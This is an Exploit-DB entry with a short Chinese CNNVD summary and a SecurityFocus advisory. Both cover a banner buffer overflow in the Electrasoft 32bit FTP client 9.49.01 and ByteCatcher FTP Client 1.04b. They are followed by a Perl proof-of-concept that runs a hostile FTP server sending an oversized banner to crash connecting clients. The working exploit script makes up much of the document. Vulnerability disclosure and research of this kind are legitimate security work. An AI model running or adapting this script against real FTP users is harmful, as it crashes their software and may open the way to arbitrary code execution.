https://www.exploit-db.com/exploits/22221
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-103

32位FTP客户端9.49.1版本存在缓冲区溢出漏洞。远程攻击者借助超长文本传输协议标语导致服务拒绝（崩溃）和可能执行任意代码。

source: http://www.securityfocus.com/bid/6764/info

It has been reported that Electrasoft 32Bit FTP client may be prone to a buffer overflow condition. This issue is due to the client not implementing bounds checking on banner data copied into local memory buffers.

It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

#!/usr/bin/perl
######################################################
#
# Affected systems:
# 32bit FTP Client version p9.49.01
# ByteCatcher FTP Client V1.04b
# Possible many other clients, got this problem to
#
# http://www.infowarfare.dk
#
# Dennis Rand - [email protected]
#
# When FTP client connects to this server they will CRASH
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
#
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "4096";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse
=> 1, Listen => 2)
or die "Couldn't create tcp-server.n";
while ($client = $server->accept()) {
print "Client connected.n";
print "Attacking...";
print $client "$buf";
print "OKn";
close($client);
}

来源:XF
名称:32bit-ftp-banner-bo(11234)
链接:http://xforce.iss.net/xforce/xfdb/11234
来源:BID
名称:6764
链接:http://www.securityfocus.com/bid/6764
来源:VULNWATCH
名称:20030204BannerBufferOverflowsfoundinMultibleFTPClients
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0054.html